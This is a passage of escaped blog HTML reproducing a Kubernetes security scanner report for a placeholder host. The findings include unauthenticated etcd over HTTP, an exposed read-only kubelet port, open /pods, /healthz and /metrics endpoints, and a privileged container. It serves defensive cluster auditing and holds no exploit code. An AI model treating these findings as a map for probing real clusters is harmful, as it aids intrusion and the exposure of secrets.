\u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| API Server:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: open service\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;service: API Server\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; host: 1.2.3.4:6443\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Etcd Remote version disclosure:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: vulnerability\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;host: 1.2.3.4:2379\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;description:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;Remote version disclosure might give an\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; \u0026nbsp; attacker a valuable data to attack a cluster\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Etcd is accessible using insecure connection (HTTP):\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: vulnerability\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;host: 1.2.3.4:2379\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;description:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;Etcd is accessible using HTTP (without\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;authorization and authentication), it would allow a\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;potential attacker to\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;gain access to\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; \u0026nbsp; the etcd\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Kubelet API (readonly):\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: open service\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;service: Kubelet API (readonly)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; host: 1.2.3.4:10255\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Etcd Remote Read Access Event:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: vulnerability\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;host: 1.2.3.4:2379\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;description:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;Remote read access might expose to an\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; \u0026nbsp; attacker cluster's possible exploits, secrets and more.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| K8s Version Disclosure:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: vulnerability\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;host: 1.2.3.4:10255\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;description:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;The kubernetes version could be obtained\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; \u0026nbsp; from logs in the \/metrics endpoint\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Privileged Container:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: vulnerability\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;host: 1.2.3.4:10255\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;description:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;A Privileged container exist on a node.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;could expose the node\/cluster to unwanted root\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; \u0026nbsp; operations\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Cluster Health Disclosure:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: vulnerability\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;host: 1.2.3.4:10255\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;description:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;By accessing the open \/healthz handler, an\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;attacker could get the cluster health state without\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; \u0026nbsp; authenticating\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Exposed Pods:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;type: vulnerability\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;host: 1.2.3.4:10255\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp;description:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;An attacker could view sensitive information\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp;about pods that are bound to a Node using\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|_\u0026nbsp; \u0026nbsp; the \/pods endpoint\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E----------\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003ENodes\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+-------------+---------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| TYPE\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | LOCATION\u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+-------------+---------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Node\/Master | 1.2.3.4\u003Cspan style=\"white-space: pre;\"\u003E  \u003C\/span\u003E\u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+-------------+---------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003EDetected Services\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+----------------------+---------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| SERVICE\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | LOCATION\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | DESCRIPTION\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+----------------------+---------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Kubelet API\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | 1.2.3.4:10255\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| The read-only port\u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| (readonly)\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| on the kubelet\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| serves health\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| probing endpoints,\u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| and is relied upon\u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| by many kubernetes\u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| componenets\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+----------------------+---------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| Etcd\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| 1.2.3.4:2379\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Etcd is a DB that\u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| stores cluster's\u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| data, it contains\u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| configuration and\u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| current state\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| information, and\u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| might contain\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| secrets\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E+----------------------+---------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E| API Server\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| 1.2.3.4:6443\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | The API server is in |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| charge of all\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 